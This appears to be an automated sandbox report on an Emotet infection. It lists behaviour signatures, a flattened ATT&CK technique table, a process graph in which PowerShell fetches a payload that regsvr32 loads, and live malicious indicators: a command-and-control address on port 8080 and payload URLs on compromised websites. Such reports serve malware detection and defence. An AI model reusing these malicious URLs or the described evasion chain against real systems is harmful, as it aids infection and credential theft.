                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF8900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65CF8860 HeapCreate,GetVersion,HeapSetInformation,

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                  Source: svchost.exe, 0000001D.00000002.506359620.00000210415F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
                  Source: svchost.exe, 0000000C.00000002.504391777.0000023BC8A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: svchost.exe, 0000000C.00000002.504488461.0000023BC8B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Files%\Windows Defender\MsMpeng.exe
                  Source: svchost.exe, 0000000C.00000002.504178254.0000023BC8A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.504488461.0000023BC8B02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 16.2.regsvr32.exe.28c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.regsvr32.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.regsvr32.exe.c60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.regsvr32.exe.28c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  Exfiltration Over Other Network Medium12
                  Ingress Tool Transfer
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts2
                  Native API
                  Boot or Logon Initialization Scripts111
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory2
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                  Encrypted Channel
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts11
                  Command and Scripting Interpreter
                  Logon Script (Windows)Logon Script (Windows)2
                  Obfuscated Files or Information
                  Security Account Manager25
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                  Non-Standard Port
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local Accounts2
                  PowerShell
                  Logon Script (Mac)Logon Script (Mac)1
                  DLL Side-Loading
                  NTDS1
                  Query Registry
                  Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Non-Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script31
                  Masquerading
                  LSA Secrets251
                  Security Software Discovery
                  SSHKeyloggingData Transfer Size Limits22
                  Application Layer Protocol
                  Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common131
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials131
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                  Process Injection
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  Hidden Files and Directories
                  Proc Filesystem1
                  Application Window Discovery
                  Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                  Regsvr32
                  /etc/passwd and /etc/shadow1
                  Remote System Discovery
                  Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 631940 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 56 Multi AV Scanner detection for domain / URL 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 4 other signatures 2->62 9 cmd.exe 1 2->9         started        12 svchost.exe 2->12         started        14 svchost.exe 2->14         started        16 11 other processes 2->16 process3 dnsIp4 68 Suspicious powershell command line found 9->68 19 powershell.exe 15 20 9->19         started        24 conhost.exe 9->24         started        70 Changes security center settings (notifications, updates, antivirus, firewall) 12->70 26 MpCmdRun.exe 1 12->26         started        72 Query firmware table information (likely to detect VMs) 14->72 44 127.0.0.1 unknown unknown 16->44 signatures5 process6 dnsIp7 46 jsonsintl.com 98.142.105.106, 49741, 80 DIMENOCUS United States 19->46 48 www.jsonsintl.com 19->48 50 192.168.2.1 unknown unknown 19->50 42 C:\Users\user\AppData\...\IKdzfJtQpj.BCP, PE32+ 19->42 dropped 64 Powershell drops PE file 19->64 28 regsvr32.exe 19->28         started        30 conhost.exe 26->30         started        file8 signatures9 process10 process11 32 regsvr32.exe 5 28->32         started        file12 40 C:\Windows\System32\...\tZBUnLQvw.dll (copy), PE32+ 32->40 dropped 54 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->54 36 regsvr32.exe 32->36         started        signatures13 process14 dnsIp15 52 173.82.82.196, 49752, 8080 MULTA-ASN1US United States 36->52 66 System process connects to network (likely due to code injection or exploit) 36->66 signatures16

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP40%ReversingLabsWin64.Trojan.Emotet
                  C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)40%ReversingLabsWin64.Trojan.Emotet
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  jsonsintl.com5%VirustotalBrowse
                  www.jsonsintl.com4%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  https://173.82.82.196:8080/temV100%Avira URL Cloudmalware
                  https://contoso.com/License0%URL Reputationsafe
                  http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/14%VirustotalBrowse
                  http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/100%Avira URL Cloudmalware
                  http://jsonsintl.com0%Avira URL Cloudsafe
                  https://173.82.82.196:8080/l100%Avira URL Cloudmalware
                  http://www.jsonsintl.com0%Avira URL Cloudsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://www.pango.co/privacy0%URL Reputationsafe
                  https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                  http://www.jsonsintl.com/0%Avira URL Cloudsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://digitalkitchen.jp/images/PVn/100%Avira URL Cloudmalware
                  https://go.micro0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://173.82.82.196/100%URL Reputationmalware
                  http://crl.ver)0%Avira URL Cloudsafe
                  https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                  http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/100%Avira URL Cloudmalware
                  https://%s.xboxlive.com0%URL Reputationsafe
                  https://173.82.82.196:8080/100%URL Reputationmalware
                  https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                  http://piffl.com/piffl.com/a/100%Avira URL Cloudmalware
                  https://nakharinitwebhosting.com/HSDYKN1X5GLF/100%Avira URL Cloudmalware
                  https://dynamic.t0%URL Reputationsafe
                  https://disneyplus.com/legal.0%URL Reputationsafe
                  http://www.jsonsintl.com40%Avira URL Cloudsafe
                  http://help.disneyplus.com.0%URL Reputationsafe
                  https://%s.dnet.xboxlive.com0%URL Reputationsafe
                  https://173.82.82.196:8080/P100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  jsonsintl.com
                  98.142.105.106
                  truetrueunknown
                  www.jsonsintl.com
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/true
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://173.82.82.196:8080/temVregsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmptrue
                              • 14%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              unknown
                              https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://jsonsintl.compowershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://173.82.82.196:8080/lregsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.jsonsintl.compowershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://contoso.com/powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.hotspotshield.com/terms/svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.pango.co/privacysvchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.320009117.0000000004E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.bingmapsportal.comsvchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.jsonsintl.com/powershell.exe, 00000002.00000002.320849477.00000000051F3000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318500901.000001C280045000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://digitalkitchen.jp/images/PVn/powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://go.micropowershell.exe, 00000002.00000003.299865395.00000000058F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000002.319452146.000001C28006A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317899105.000001C280068000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/Iconpowershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://173.82.82.196/regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • URL Reputation: malware
                                                              unknown
                                                              http://crl.ver)svchost.exe, 00000013.00000002.506283732.000002591240E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436767944.0000019AC6500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000016.00000003.412280147.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.412123410.0000019AC659A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://%s.xboxlive.comsvchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  low
                                                                  https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.hotspotshield.com/svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://173.82.82.196:8080/regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • URL Reputation: malware
                                                                              unknown
                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
